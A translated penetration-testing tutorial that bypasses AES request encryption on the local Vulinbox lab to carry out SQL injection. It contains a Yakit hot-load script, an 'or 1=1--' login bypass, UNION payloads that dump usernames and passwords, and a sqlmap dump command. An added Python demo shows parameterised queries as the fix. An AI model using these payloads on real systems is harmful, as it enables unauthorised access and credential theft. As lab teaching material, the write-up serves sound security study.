Penetration Testing: Front-end/Back-end Encryption Analysis, SQL Injection under AES Encryption
This is the ninth and final article in the "Advanced Front-end Encryption, Decryption and Signature Verification in Practice" series. The lab target for the whole series is the Vulinbox range bundled with Yakit; this article walks through bypassing front-end/back-end encryption to perform SQL injection.
Login
Enter a username and password, capture the request and inspect it. It looks like ordinary AES encryption:
The hot-loading code here is not hard; the usual encrypt/decrypt functions are enough:
```yak
encryptAES = (packet) => {
    body = poc.GetHTTPPacketBody(packet)
    // Generate a random key and IV for every request (the client picks them)
    key = randstr(16)
    iv = randstr(12)
    // Encrypt the plaintext body
    data = codec.AESCBCEncrypt(key /*type: []byte*/, body, iv /*type: []byte*/)~
    data = codec.EncodeBase64(data)
    // Hex-encode the key and IV; they travel in the clear next to the ciphertext
    hexKey = codec.EncodeToHex(key)
    hexIV = codec.EncodeToHex(iv)
    // Build the new body in the server's envelope format
    body = f`{"key": "${hexKey}","iv": "${hexIV}","message": "${data}"}`
    return poc.ReplaceBody(packet, body, false)
}

decryptAES = (packet) => {
    body = poc.GetHTTPPacketBody(packet)
    body = json.loads(body)
    // Recover the key and IV from the envelope, then decrypt the message
    key = codec.DecodeHex(body.key)~
    iv = codec.DecodeHex(body.iv)~
    data = codec.DecodeBase64(body.message)~
    data = codec.AESCBCDecrypt(key, data, iv)~
    return poc.ReplaceBody(packet, data, false)
}

// Hooks: encrypt outgoing requests, decrypt incoming responses
beforeRequest = func(req){
    return encryptAES(req)
}
afterRequest = func(rsp){
    return decryptAES(rsp)
}
```
Request body format:
```json
{"username":"admin","password":"password"}
```
Hot-loaded encryption and decryption work.
The hint for this level is SQL injection, so just drop in a 1=1, and before you know it the login succeeds:
```http
POST /crypto/sqli/aes-ecb/encrypt/login HTTP/1.1
Host: 127.0.0.1:8787
Content-Type: application/json

{"username":"admin","password":"password'or 1=1--"}
```
Injection
Manual
After logging in, a request to the /crypto/sqli/aes-ecb/encrypt/query/users path is observed.
Decrypt the request packet:
This gives the request format:
```json
{"search":""}
```
This is SQLite injection; the injection statements were taken from this article: sqlite注入的一点总结 - 先知社区 (aliyun.com) ("A few notes on SQLite injection", Xianzhi community).
```json
{"search":"user1'order by 3--"}
{"search":"user1'union select 1,2,3--"}
{"search":"user1'union select 11,22,sql from sqlite_master--"}
{"search":"user1'union select 11,22,sql from sqlite_master where type='table' and name='vulin_users'--"}
{"search":"user1'union select username,password,id from vulin_users--"}
```
Injection succeeds:
```http
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119

{"search":"user1'union select username,password,id from vulin_users--"}
```
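As an added example (not part of the original article or of Vulinbox itself), the script below models the server side of the /query/users search against a constructed in-memory SQLite database: a handler that concatenates the decrypted search value into the SQL text next to one that binds it as a parameter, both run with the exact payload above. The table layout and the SELECT are assumptions; the article only establishes that the result has three columns.

```python
import sqlite3

# Constructed in-memory stand-in for the Vulinbox SQLite database.
# Real column layout is not shown in the article; the schema here is assumed.
SEED_SQL = """
CREATE TABLE vulin_users (
    id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT
);
INSERT INTO vulin_users (username, password, role) VALUES
    ('admin', 'password', 'admin'),
    ('user1', 'user1pass', 'user'),
    ('user2', 'user2pass', 'user');
"""

# The exact "search" value the article decrypts out of the /query/users request.
PAYLOAD = "user1'union select username,password,id from vulin_users--"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SEED_SQL)
    return conn


def search_users_vulnerable(conn, term):
    """Hypothetical handler: the decrypted 'search' value is pasted into SQL text.

    The AES envelope only hides the value on the wire; once the server has
    decrypted it, it is ordinary attacker-controlled input."""
    sql = f"SELECT id, username, role FROM vulin_users WHERE username = '{term}'"
    return conn.execute(sql).fetchall()


def search_users_safe(conn, term):
    """Same lookup with a bound parameter: quotes, UNION and -- are plain data."""
    sql = "SELECT id, username, role FROM vulin_users WHERE username = ?"
    return conn.execute(sql, (term,)).fetchall()


def demo():
    conn = make_db()
    return {
        "vulnerable": search_users_vulnerable(conn, PAYLOAD),  # 4 rows, passwords included
        "safe": search_users_safe(conn, PAYLOAD),              # [] (no such username)
        "safe_legit": search_users_safe(conn, "user1"),        # [(2, 'user1', 'user')]
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The encryption layer changes nothing here: the fix is the bound parameter in the second handler, not the envelope.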
sqlmap
Load the hot-loading code in the MITM module.
Run sqlmap against the request:
```shell
python .\sqlmap.py -r .\http.txt --proxy=http://127.0.0.1:8081 --batch --dbms=sqlite -T vulin_users -C username,password,role --dump
```
http.txt:
```http
POST /crypto/sqli/aes-ecb/encrypt/query/users HTTP/1.1
Host: 127.0.0.1:8787
Cookie: token=PLNqoZMZfiELLLFuTbmOtSrDdnpFmDDM
Content-Type: application/json
Content-Length: 119

{"search":"*"}
```
Result: